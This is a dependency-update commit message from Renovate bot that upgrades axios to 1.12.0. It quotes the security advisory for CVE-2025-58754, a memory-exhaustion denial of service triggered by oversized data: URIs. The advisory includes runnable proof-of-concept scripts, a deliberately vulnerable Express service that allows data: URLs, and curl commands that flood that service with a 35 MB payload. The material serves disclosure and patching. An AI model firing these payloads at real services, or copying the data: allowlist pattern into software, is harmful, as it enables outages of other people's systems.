Commit 5f5133f
chore(deps): update dependency axios to v1.12.0 [security] (#749)
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [axios](https://axios-http.com) ([source](https://redirect.github.com/axios/axios)) | [`1.11.0` -> `1.12.0`](https://renovatebot.com/diffs/npm/axios/1.11.0/1.12.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) |
### GitHub Vulnerability Alerts
#### [CVE-2025-58754](https://redirect.github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj)
## Summary
When Axios runs on Node.js and is given a URL with the `data:` scheme,
it does not perform HTTP. Instead, its Node http adapter decodes the
entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200
response.
This path ignores `maxContentLength` / `maxBodyLength` (which only
protect HTTP responses), so an attacker can supply a very large `data:`
URI and cause the process to allocate unbounded memory and crash (DoS),
even if the caller requested `responseType: 'stream'`.
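A minimal sketch of that claim (an assumption-labeled illustration for axios < 1.12.0 on Node, not code from the advisory): even when the caller asks for a stream, the `data:` path hands back a fully decoded `Buffer`.
```js
const axios = require('axios');

// Hedged illustration, assumes axios < 1.12.0 on Node: the data: path ignores
// responseType: 'stream' and returns the entire decoded payload as a Buffer.
axios.get('data:application/octet-stream;base64,' + 'A'.repeat(4000), {
  responseType: 'stream',
  maxContentLength: 1024 // not consulted on the data: path
}).then(res => {
  console.log(Buffer.isBuffer(res.data)); // true: nothing was streamed, ~3 KB buffered
});
```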
## Details
The Node adapter (`lib/adapters/http.js`) supports the `data:` scheme.
When `axios` encounters a request whose URL starts with `data:`, it does
not perform an HTTP request. Instead, it calls `fromDataURI()` to decode
the Base64 payload into a Buffer or Blob.
Relevant code from [`httpAdapter`](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):
```js
const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;

  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }

  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });

  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}
```
The decoder is in [`lib/helpers/fromDataURI.js`](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):
```js
export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');

    if (asBlob) { return new _Blob([buffer], {type: mime}); }

    return buffer;
  }

  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
```
* The function decodes the entire Base64 payload into a Buffer with no
size limits or sanity checks.
* It does **not** honour `config.maxContentLength` or
`config.maxBodyLength`, which only apply to HTTP streams.
* As a result, a `data:` URI of arbitrary size can cause the Node
process to allocate the entire content into memory.
In comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and rejects the request once `totalResponseBytes` exceeds [`maxContentLength`](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550).
No such check occurs for `data:` URIs.
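To make the contrast concrete, a small hedged sketch (assuming axios < 1.12.0 on Node; the oversized HTTP URL is hypothetical): the HTTP request is rejected once the accumulated body exceeds `maxContentLength`, while the `data:` request decodes its full payload regardless of the same setting.
```js
const axios = require('axios');

// HTTP path: the Node adapter tracks totalResponseBytes and rejects the
// request once it exceeds maxContentLength (hypothetical oversized endpoint).
axios.get('https://example.com/large-file', { maxContentLength: 1024 })
  .catch(err => console.log('HTTP rejected:', err.message));

// data: path (pre-1.12.0): maxContentLength is never consulted, so the whole
// payload is decoded into memory.
axios.get('data:application/octet-stream;base64,' + 'A'.repeat(10_000), {
  maxContentLength: 1024,
  responseType: 'arraybuffer'
}).then(res => console.log('data: decoded bytes:', res.data.length)); // ~7500
```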
## PoC
```js
const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // ~120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;
  console.log('Generating URI with base64 length:', base64.length);

  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});
```
Run with limited heap to force a crash:
```bash
node --max-old-space-size=100 poc.js
```
Since Node heap is capped at 100 MB, the process terminates with an
out-of-memory error:
```
<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…
```
Mini real-app PoC:
A small link-preview service that uses axios with streaming, keep-alive agents, timeouts, and a JSON body limit. Because it allows `data:` URLs, axios ignores `maxContentLength` and `maxBodyLength` and fully decodes the payload into memory on Node before any streaming happens, enabling DoS.
```js
import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });

const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));
app.get("/healthz", (req, res) => res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */
app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data: in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;
  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before) / 1024 / 1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before) / 1024 / 1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});
```
Run this app and send three POST requests:
```sh
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
  | tee payload.json >/dev/null

seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null
```
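One plausible way to run the service under a constrained heap before firing the requests (the file name `server.mjs`, the 150 MB cap, and the `$URL` value below are assumptions, not part of the advisory):
```sh
# Assumed entry point and heap cap; adjust to your setup.
NODE_OPTIONS="--max-old-space-size=150" node server.mjs &

# Port 8081 and the /preview route come from the PoC app above.
URL="http://127.0.0.1:8081/preview"
```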
---
## Suggestions
1. **Enforce size limits**
   For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit (a sketch of such a check follows this list).
2. **Stream decoding**
   Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
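A minimal sketch of the first suggestion, estimating the decoded size from the raw URI before it is handed to the decoder (the helper name `assertDataUriWithinLimit` is hypothetical and not part of axios; the actual fix shipped in 1.12.0 may differ):
```js
// Hedged sketch, not the actual axios fix: estimate the decoded size of a
// data: URI up front and reject it if a configured limit would be exceeded.
function assertDataUriWithinLimit(uri, maxContentLength) {
  const comma = uri.indexOf(',');
  if (comma === -1) throw new Error('malformed data: URI');

  const meta = uri.slice(0, comma);      // e.g. "data:application/octet-stream;base64"
  const payload = uri.slice(comma + 1);

  // Base64 decodes to roughly 3/4 of its encoded length; for URL-encoded text
  // the encoded length is already an upper bound on the decoded size.
  const isBase64 = /;base64$/i.test(meta);
  const estimatedBytes = isBase64 ? Math.ceil(payload.length * 3 / 4) : payload.length;

  if (maxContentLength > -1 && estimatedBytes > maxContentLength) {
    throw new Error(`data: URI of ~${estimatedBytes} bytes exceeds maxContentLength ${maxContentLength}`);
  }
}

// Usage: run the check before handing the URI to the decoder.
assertDataUriWithinLimit('data:text/plain;base64,' + 'A'.repeat(1024), 8 * 1024);   // passes
// assertDataUriWithinLimit('data:text/plain;base64,' + 'A'.repeat(1e8), 8 * 1024); // throws
```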
---
### Release Notes
<details>
<summary>axios/axios (axios)</summary>
### [`v1.12.0`](https://redirect.github.com/axios/axios/blob/HEAD/CHANGELOG.md#1120-2025-09-11)

[Compare Source](https://redirect.github.com/axios/axios/compare/v1.11.0...v1.12.0)
##### Bug Fixes
- adding build artifacts
([9ec86de](https://redirect.github.com/axios/axios/commit/9ec86de257bfa33856571036279169f385ed92bd))
- dont add dist on release
([a2edc36](https://redirect.github.com/axios/axios/commit/a2edc3606a4f775d868a67bb3461ff18ce7ecd11))
- **fetch-adapter:** set correct Content-Type for Node FormData
([#​6998](https://redirect.github.com/axios/axios/issues/6998))
([a9f47af](https://redirect.github.com/axios/axios/commit/a9f47afbf3224d2ca987dbd8188789c7ea853c5d))
- **node:** enforce maxContentLength for data: URLs
([#​7011](https://redirect.github.com/axios/axios/issues/7011))
([945435f](https://redirect.github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593))
- package exports
([#​5627](https://redirect.github.com/axios/axios/issues/5627))
([aa78ac2](https://redirect.github.com/axios/axios/commit/aa78ac23fc9036163308c0f6bd2bb885e7af3f36))
- **params:** removing '\[' and ']' from URL encode exclude characters
([#​3316](https://redirect.github.com/axios/axios/issues/3316))
([#​5715](https://redirect.github.com/axios/axios/issues/5715))
([6d84189](https://redirect.github.com/axios/axios/commit/6d84189349c43b1dcdd977b522610660cc4c7042))
- release pr run
([fd7f404](https://redirect.github.com/axios/axios/commit/fd7f404488b2c4f238c2fbe635b58026a634bfd2))
- **types:** change the type guard on isCancel
([#​5595](https://redirect.github.com/axios/axios/issues/5595))
([0dbb7fd](https://redirect.github.com/axios/axios/commit/0dbb7fd4f61dc568498cd13a681fa7f907d6ec7e))
##### Features
- **adapter:** surface low‑level network error details; attach original
error via cause
([#​6982](https://redirect.github.com/axios/axios/issues/6982))
([78b290c](https://redirect.github.com/axios/axios/commit/78b290c57c978ed2ab420b90d97350231c9e5d74))
- **fetch:** add fetch, Request, Response env config variables for the
adapter;
([#​7003](https://redirect.github.com/axios/axios/issues/7003))
([c959ff2](https://redirect.github.com/axios/axios/commit/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b))
- support reviver on JSON.parse
([#​5926](https://redirect.github.com/axios/axios/issues/5926))
([2a97634](https://redirect.github.com/axios/axios/commit/2a9763426e43d996fd60d01afe63fa6e1f5b4fca)),
closes
[#​5924](https://redirect.github.com/axios/axios/issues/5924)
- **types:** extend AxiosResponse interface to include custom headers
type
([#​6782](https://redirect.github.com/axios/axios/issues/6782))
([7960d34](https://redirect.github.com/axios/axios/commit/7960d34eded2de66ffd30b4687f8da0e46c4903e))
##### Contributors to this release
- <img src="https://avatars.githubusercontent.com/u/22686401?v=4&s=18" alt="avatar" width="18"/> [Willian Agostini](https://redirect.github.com/WillianAgostini "+132/-16760 (#7002 #5926 #6782)")
- <img src="https://avatars.githubusercontent.com/u/12586868?v=4&s=18" alt="avatar" width="18"/> [Dmitriy Mozgovoy](https://redirect.github.com/DigitalBrainJS "+4263/-293 (#7006 #7003)")
- <img src="https://avatars.githubusercontent.com/u/53833811?v=4&s=18" alt="avatar" width="18"/> [khani](https://redirect.github.com/mkhani01 "+111/-15 (#6982)")
- <img src="https://avatars.githubusercontent.com/u/7712804?v=4&s=18" alt="avatar" width="18"/> [Ameer Assadi](https://redirect.github.com/AmeerAssadi "+123/-0 (#7011)")
- <img src="https://avatars.githubusercontent.com/u/70265727?v=4&s=18" alt="avatar" width="18"/> [Emiedonmokumo Dick-Boro](https://redirect.github.com/emiedonmokumo "+55/-35 (#6998)")
- <img src="https://avatars.githubusercontent.com/u/47859767?v=4&s=18" alt="avatar" width="18"/> [Zeroday BYTE](https://redirect.github.com/opsysdebug "+8/-8 (#6980)")
- <img src="https://avatars.githubusercontent.com/u/4814473?v=4&s=18" alt="avatar" width="18"/> [Jason Saayman](https://redirect.github.com/jasonsaayman "+7/-7 (#6985 #6985)")
- <img src="https://avatars.githubusercontent.com/u/13010755?v=4&s=18" alt="avatar" width="18"/> [최예찬](https://redirect.github.com/HealGaren "+5/-7 (#5715)")
- <img src="https://avatars.githubusercontent.com/u/7002604?v=4&s=18" alt="avatar" width="18"/> [Gligor Kotushevski](https://redirect.github.com/gligorkot "+3/-1 (#5627)")
- <img src="https://avatars.githubusercontent.com/u/15893?v=4&s=18" alt="avatar" width="18"/> [Aleksandar Dimitrov](https://redirect.github.com/adimit "+2/-1 (#5595)")
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).
🚦 **Automerge**: Enabled.
♻ **Rebasing**: Whenever PR is behind base branch, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/apify/apify-client-js).
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>

1 parent: 9d0a16b
1 file changed: package-lock.json (+3 −3 lines)